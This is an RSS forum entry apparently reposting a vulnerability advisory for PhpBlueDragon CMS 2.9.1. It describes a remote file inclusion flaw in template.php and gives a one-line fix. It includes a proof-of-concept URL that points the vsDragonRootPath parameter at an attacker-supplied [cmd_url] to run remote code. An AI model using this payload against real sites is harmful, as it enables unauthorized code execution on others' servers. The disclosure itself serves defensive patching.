<![CDATA[Latest posts for the topic "PhpBlueDragon CMS 2.9.1, File inclusion vulnerability"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net PhpBlueDragon CMS 2.9.1, File inclusion vulnerability http://phpbluedragon.net/ Patch: unavailable ----------------------------------------------------- 1) Description: Error occured in template.php, line 23: --- require($vsDragonRootPath."public_includes/pub_kernel/pbd_template_custom.php"); --- 2) Proof of concept: Code:
http://example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/ 
(note this is with final slash (/))
3) Solution: sanitized $vsDragonRootPath ]]>
/hvaonline/posts/list/86.html#370 /hvaonline/posts/list/86.html#370 GMT